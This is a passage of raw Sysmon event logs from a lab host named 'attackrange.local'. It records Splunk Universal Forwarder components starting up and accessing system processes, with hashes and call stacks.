Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.888{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EF705C2440D9EAF2528F2EA3523442C,SHA256=D48111E967958966DC0281720BB51DF89AF55B6F746B6247DF9E4CAE3A453644,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.786{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.922{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96897D1ECB806A37FF863A49CCED5114,SHA256=344DE650BD97C19732AE810D87ECF412BFB58449A7F465071B34BF54802FD2CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A85439F54F27DC0107460570C92A8448,SHA256=B660E0D78B78A6F5583164246BA3904142F9EDE43F54499A89099F79DF27AAC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.639{B81B27B7-A1E2-6140-AA56-04000000C801}69246912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.486{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1E2-6140-AA56-04000000C801}6924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.486{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.486{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.486{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.486{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.486{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A1E2-6140-AA56-04000000C801}6924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.486{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1E2-6140-AA56-04000000C801}6924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:38.471{B81B27B7-A1E2-6140-AA56-04000000C801}6924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFF167CF881C964BE849DAB172AD3F7B,SHA256=D54D50EB4AC3538F838E493A14295BCFB267135BBB4277F6C7DB7593A9F499A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.185{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1E3-6140-AB56-04000000C801}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.185{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.185{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.185{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.185{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.185{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A1E3-6140-AB56-04000000C801}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.185{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1E3-6140-AB56-04000000C801}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:39.170{B81B27B7-A1E3-6140-AB56-04000000C801}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.948{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93863DDE39034BBF65D67140F549A4CC,SHA256=AE567E534D139E28DF7B25C9FD70612B45F389991B7FC6DCC85A39E221FB803A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 